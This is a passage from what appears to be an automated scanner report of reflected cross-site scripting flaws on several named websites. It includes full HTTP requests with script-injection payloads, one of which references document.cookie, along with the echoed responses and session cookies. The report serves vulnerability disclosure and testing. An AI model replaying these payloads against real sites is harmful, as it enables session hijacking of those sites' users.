<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1&print=ed"> ...[SNIP]...
3.69. http://my.supermedia.com/directoryoptout [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://my.supermedia.com
Path: /directoryoptout
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37fe3"><script>alert(1)</script>84741f5cfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directoryoptout?37fe3"><script>alert(1)</script>84741f5cfde=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:26 GMT
Pragma: no-cache
Content-Length: 24725
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NLD6RFdXPRTw2vwG1LgBrG7JnC27kyJ154JBgp4LL03M7ljcGhrz!-1173275059!-550558129; path=/
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:44:01 GMT;path=/;httponly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3"><script>alert(1)</script>84741f5cfde=1&print=ed"> ...[SNIP]...
The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8cf"><script>alert(1)</script>b83041eb0df was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=11e8cf"><script>alert(1)</script>b83041eb0df&print=ed"> ...[SNIP]...
3.71. http://my.supermedia.com/directoryoptout/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://my.supermedia.com
Path: /directoryoptout/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87e3"><script>alert(1)</script>55222cbb99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1&a87e3"><script>alert(1)</script>55222cbb99d=1&print=ed"> ...[SNIP]...
3.72. http://my.supermedia.com/directoryoptout/confirm.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://my.supermedia.com
Path: /directoryoptout/confirm.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 319e1"><script>alert(1)</script>a37efd293c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /directoryoptout/confirm.do?319e1"><script>alert(1)</script>a37efd293c2=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:32 GMT
Pragma: no-cache
Content-Length: 25076
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:08 GMT;path=/;httponly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?319e1"><script>alert(1)</script>a37efd293c2=1&print=ed"> ...[SNIP]...
The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1233c"><script>alert(1)</script>6337a742d73 was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:24 GMT
Pragma: no-cache
Content-Length: 24636
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:59 GMT;path=/;httponly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73&print=ed"> ...[SNIP]...
3.74. http://my.supermedia.com/directoryoptout/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://my.supermedia.com
Path: /directoryoptout/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb13"><script>alert(1)</script>0d37311fbea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:31 GMT
Pragma: no-cache
Content-Length: 24551
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!-- tiles layout page => standard_page.jsp --> <!-- <html head ...[SNIP]... <a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1&print=ed"> ...[SNIP]...
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload c34fc<script>alert(1)</script>1395c3bee03 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=jsonc34fc<script>alert(1)</script>1395c3bee03&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml
Date: Thu, 03 Feb 2011 21:44:41 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=a72418f5-7573-4033-a20c-768665ba4c71;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT
Set-Cookie: taboola_session_id_veoh=v1_7d4cc60fd932dcc7937c149c3cdf9f52_a72418f5-7573-4033-a20c-768665ba4c71_1296769481_1296769481;Path=/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT
Set-Cookie: taboola_rii_veoh=1039225080754099931_5874168958137325309;Path=/;Expires=Fri, 03-Feb-12 21:44:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4107
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <title>Error 500 serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. se ...[SNIP]... <pre>com.taboola.trc.vhf.exceptions.VHFRequestException: serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.selectSerializer(RecommendationClientAda ...[SNIP]...
The value of the item-type request parameter is copied into the HTML document as plain text between tags. The payload 93a54<script>alert(1)</script>e2384cd3dfb was submitted in the item-type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video93a54<script>alert(1)</script>e2384cd3dfb&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb
Date: Thu, 03 Feb 2011 21:45:01 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=b3bd9e1a-f928-4358-bae5-e232f65ed404;Path=/;Expires=Fri, 03-Feb-12 21:45:01 GMT
Set-Cookie: taboola_session_id_veoh=v1_ffd326beb15e99ba266c923fcd06736e_b3bd9e1a-f928-4358-bae5-e232f65ed404_1296769501_1296769501;Path=/
Set-Cookie: JSESSIONID=.prod2-f1;Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 4183
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <title>Error 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script&g ...[SNIP]... <pre>java.lang.IllegalArgumentException: No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb at java.lang.Enum.valueOf(Enum.java:196) at com.taboola.model.general.RecommendableItem$ItemType.valueOf(RecommendableItem.java:69) at com.taboola.trc.data.TextRelatedContentDataSource.getItemType( ...[SNIP]...
The value of the list-id request parameter is copied into the HTML document as plain text between tags. The payload 5b0f1<script>alert(1)</script>7876a2b5e3a was submitted in the list-id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dispatch/?publisher=veoh&list-id=rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads)
Date: Thu, 03 Feb 2011 21:44:34 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=6b3a89d9-b958-41dd-9e3d-cae259e7686f;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT
Set-Cookie: taboola_session_id_veoh=v1_ef0ffcfd24d42f1d8f2b50542c8bf625_6b3a89d9-b958-41dd-9e3d-cae259e7686f_1296769474_1296769474;Path=/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4111
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <title>Error 500 unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for ...[SNIP]... <pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads) at com.taboola.trc.vhf.viewsHandler.GeneralViewsProducer.handleViewRequest(GeneralViewsProducer.java:336) at com.taboola.trc.vhf.viewsHandler. ...[SNIP]...
The value of the publisher request parameter is copied into the HTML document as plain text between tags. The payload 3cb6d<script>alert(1)</script>b0331f67d92 was submitted in the publisher parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dispatch/?publisher=veoh3cb6d<script>alert(1)</script>b0331f67d92&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92
Date: Thu, 03 Feb 2011 21:44:27 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: close
Content-Length: 3330
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/> <title>Error 500 Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script> ...[SNIP]... <pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92 at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.dispatchPrehandling(RecommendationClientAdaptor.java:746) at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.httpClientRequest(Reco ...[SNIP]...
3.79. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bizfind.us
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bfe"><script>alert(1)</script>18ca5e0718d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?97bfe"><script>alert(1)</script>18ca5e0718d=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15800
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=FDMOGJOBLPHILKAOOAOJGEGF; path=/
Cache-control: private
3.80. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bizfind.us
Path: /15/182221/abc-development-inc/chicago.aspx/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ef9"><script>alert(1)</script>dd38641bfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22?d9ef9"><script>alert(1)</script>dd38641bfde=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11704
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=JDEEKNBBLGAHBJGBEKACDHHM; path=/
Cache-control: private
The value of REST URL parameter 6 is copied into the name of an HTML tag attribute. The payload 3c056%20a%3dbd8be886654d was submitted in the REST URL parameter 6. This input was echoed as 3c056 a=bd8be886654d in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns3c056%20a%3dbd8be886654d=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12113
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=IOMOGJOBLGKMEEODHDPJNBFA; path=/
Cache-control: private
3.82. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fc8"><script>alert(1)</script>3c5d1bbb05c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?21fc8"><script>alert(1)</script>3c5d1bbb05c=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 12152
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=CCMOGJOBOEJLBIDGEPLHOCKP; path=/
Cache-control: private
3.83. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload 55cfe><a>a5947f68df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)?55cfe><a>a5947f68df6=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11931
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=DNLOGJOBDBDLOPJCCANBACKG; path=/
Cache-control: private
3.84. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.butterscotch.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f74ff'><script>alert(1)</script>d34a3b78cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f74ff'><script>alert(1)</script>d34a3b78cab=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 231c0'><script>alert(1)</script>53794fb9664 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?src=tcv3video231c0'><script>alert(1)</script>53794fb9664 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0b4'><script>alert(1)</script>f96c8436d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shows/A-List2f0b4'><script>alert(1)</script>f96c8436d8c HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
